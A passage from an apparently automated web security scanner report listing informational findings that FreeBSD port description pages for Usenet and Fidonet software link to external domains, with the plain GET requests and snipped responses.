<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
ave whole area or one letter in a
text file, enter mail in any area (using an external editor), insert tagline
from a tagline file, reply mail with quote, write netmail, and netmail
addressbook.

WWW: <A HREF="http://multimail.sourceforge.net/">http://multimail.sourceforge.net/</A>
...[SNIP]...

20.621. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/newsstar/pkg-descr

The response contains the following links to other domains:

http://newsstar.sourceforge.net/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/newsstar/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
refore I wanted a program which could fetch
whatever articles my ISP has available, but use the foreign server to avoid
missing posts or getting them very late, and to do it as fast as possible.

WWW: <A HREF="http://newsstar.sourceforge.net/">http://newsstar.sourceforge.net/</A>
...[SNIP]...

20.622. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/xpn/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://xpn.altervista.org/

Request

GET /cgi/url.cgi?ports/news/xpn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:44 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
is always possible to override this choice.

There also other useful features like scoring, filtered views,
random tag-lines, external editor support, one-key navigation,
ROT13, spoiler char ...

WWW: <A HREF="http://xpn.altervista.org/">http://xpn.altervista.org/</A>
...[SNIP]...

20.623. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/nget/pkg-descr

The response contains the following links to other domains:

http://nget.sourceforge.net/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/nget/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:09 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
sy retrieval,
even substituting parts from multiple servers. It handles disconnects
gracefully, resuming after the last part successfully downloaded,
and caching of header data for quick access.

WWW: <A HREF="http://nget.sourceforge.net/">http://nget.sourceforge.net/</A>
...[SNIP]...

20.624. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/lottanzb/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.lottanzb.org/

Request

GET /cgi/url.cgi?ports/news/lottanzb/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
LottaNZB is a graphical usenet frontend utilizing hellanzb
that simplifies the retrieval of binary news.

WWW: <A HREF="http://www.lottanzb.org">http://www.lottanzb.org</A>
...[SNIP]...

20.625. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/newsx/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.kvaleberg.com/newsx.html

Request

GET /cgi/url.cgi?ports/news/newsx/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
e not
distributed in the usual manner. Since newsx obeys the normal news spool
configuration file and requires little or no specific configuration, the
administrative burden should be minimized.

WWW: <A HREF="http://www.kvaleberg.com/newsx.html">http://www.kvaleberg.com/newsx.html</A>
...[SNIP]...

20.626. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/slrnconf/pkg-descr

The response contains the following links to other domains:

http://home.arcor.de/kaffeetisch/slrnconf.html
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/slrnconf/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:32 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
iry configuration of SLRN a
bit easier. Slrnconf will try to read your ~/.slrnrc at
startup. If you're using a different file, just open it via
File -> Open. There are no command line switches.

WWW: <A HREF="http://home.arcor.de/kaffeetisch/slrnconf.html">http://home.arcor.de/kaffeetisch/slrnconf.html</A>
...[SNIP]...

20.627. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/sn/pkg-descr

The response contains the following links to other domains:

http://infa.abo.fi/~patrik/sn/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/sn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:34 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
on to the internet. It is similar
to Leafnode. The target user is a home or SOHO with a single modem
connection to the Internet, maybe running IP masq or similar, and
serving a few workstations.

WWW: <A HREF="http://infa.abo.fi/~patrik/sn/">http://infa.abo.fi/~patrik/sn/</A>
...[SNIP]...

20.628. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/p5-News-Article/pkg-descr

The response contains the following links to other domains:

http://www.erlenstar.demon.co.uk/perl/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-News-Article/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:16 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
This module allows for creating articles from scratch, or reading them
from various data sources; various header manipulations, and posting
via NNTP or mailing via a sendmail-workalike.

WWW: <A HREF="http://www.erlenstar.demon.co.uk/perl/">http://www.erlenstar.demon.co.uk/perl/</A>
...[SNIP]...

20.629. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/p5-POE-Component-Client-NNTP/pkg-descr

The response contains the following links to other domains:

http://search.cpan.org/dist/POE-Component-Client-NNTP/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-POE-Component-Client-NNTP/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:23 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
POE::Component::Client::NNTP is a POE component that provides
non-blocking NNTP access to other components and sessions.

WWW: <A HREF="http://search.cpan.org/dist/POE-Component-Client-NNTP/">http://search.cpan.org/dist/POE-Component-Client-NNTP/</A>
...[SNIP]...

20.630. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/openftd/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.ftd.nu/
http://www.ftd4linux.nl/

Request

GET /cgi/url.cgi?ports/news/openftd/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:14 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
Fill Threads Database is a dutch Usenet binaries grabber.
OpenFTD is the open source implementation of it.

Use the "ftd" program to start the gui.

WWW: <A HREF="http://www.ftd4linux.nl/">http://www.ftd4linux.nl/</A>
WWW: <A HREF="http://www.ftd.nu/">http://www.ftd.nu/</A>
...[SNIP]...

20.631. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/pyne/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.soul-less.pwp.blueyonder.co.uk/pyne/

Request

GET /cgi/url.cgi?ports/news/pyne/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:30 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
Pyne is an X11 offline Newsreader/Emailer using the GTK+ toolkit.

WWW: <A HREF="http://www.soul-less.pwp.blueyonder.co.uk/pyne/">http://www.soul-less.pwp.blueyonder.co.uk/pyne/</A>
...[SNIP]...

20.632. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/leafnode/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.leafnode.org/

Request

GET /cgi/url.cgi?ports/news/leafnode/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:56 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
wnloaded based on what's accessed.
Use it to enable online newsreaders to offline reading or to reduce your
external bandwidth if you have several users accessing Usenet news.

-- Matthias Andree
WWW: <A HREF="http://www.leafnode.org/">http://www.leafnode.org/</A>
...[SNIP]...

20.633. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/diablo/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.openusenet.org/diablo/

Request

GET /cgi/url.cgi?ports/news/diablo/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:30 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
that was originally developed by Matthew Dillon and is now run as an open
source project. Diablo is significantly faster and more robust than INN,
and scales well to multi-server installations.

WWW: <A HREF="http://www.openusenet.org/diablo/">http://www.openusenet.org/diablo/</A>
...[SNIP]...

20.634. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/noffle/pkg-descr

The response contains the following links to other domains:

http://noffle.sourceforge.net/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/noffle/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:12 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
on the local host, but gets its news
feed by acting as a client to a remote server. Allows reading
news offline with many news clients, even if they do not
support offline reading by themselves.

WWW: <A HREF="http://noffle.sourceforge.net">http://noffle.sourceforge.net</A>
...[SNIP]...

20.635. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/husky-base/pkg-descr

The response contains the following links to other domains:

http://husky.sourceforge.net/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/husky-base/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:36 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
Common files for Husky Fidosoft Project.

Husky is complete freeware suite of Fidonet applications.

WWW: <A HREF="http://husky.sourceforge.net/">http://husky.sourceforge.net/</A>
...[SNIP]...

20.636. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/hellanzb/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.hellanzb.com/

Request

GET /cgi/url.cgi?ports/news/hellanzb/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:35 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
-free as
possible. Once fully installed, all that's required is moving an nzb file to the
queue directory. The rest: downloading, par-checking, un-raring, etc. is done
automatically by hellanzb.

WWW: <A HREF="http://www.hellanzb.com">http://www.hellanzb.com</A>
...[SNIP]...

20.637. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/newspost/pkg-descr

The response contains the following links to other domains:

http://newspost.unixcab.org/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/newspost/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:07 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
l-featured USEnet binary autoposter. It is meant as
an all-in-one posting solution. In addition to posting files, it can
post text prefixes, and generate and post .SFV files and .PAR volumes.

WWW: <A HREF="http://newspost.unixcab.org/">http://newspost.unixcab.org/</A>
...[SNIP]...

20.638. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/p5-News-Article-NoCeM/pkg-descr

The response contains the following links to other domains:

http://search.cpan.org/dist/News-Article-NoCeM/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-News-Article-NoCeM/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:17 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
News::Article::NoCeM is a library of perl modules for managing NoCeM notice in
Network News services. It's meant to be used for code-reuse and sharing when
writing news-based applications.

WWW: <A HREF="http://search.cpan.org/dist/News-Article-NoCeM/">http://search.cpan.org/dist/News-Article-NoCeM/</A>
...[SNIP]...

20.639. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/grn/pkg-descr

The response contains the following links to other domains:

http://grn.sourceforge.net/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/grn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:34 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
Grn also uses pthreads to allow the user to interact with the program during
different time-consuming tasks (such as fetching grouplist or threading
articles - these all run in another thread).

WWW: <A HREF="http://grn.sourceforge.net/">http://grn.sourceforge.net/</A>
...[SNIP]...

20.640. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/ifmail/pkg-descr

The response contains the following links to other domains:

http://ifmail.sourceforge.net/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/ifmail/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:53 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
rts Fidonet net- and
echomail to RFC-822/RFC-1036 compliant mail and news
and vice versa. In cooperation with MTA and netnews
packages allows to run a FidoNet node (or point) on
a UN*X machine.

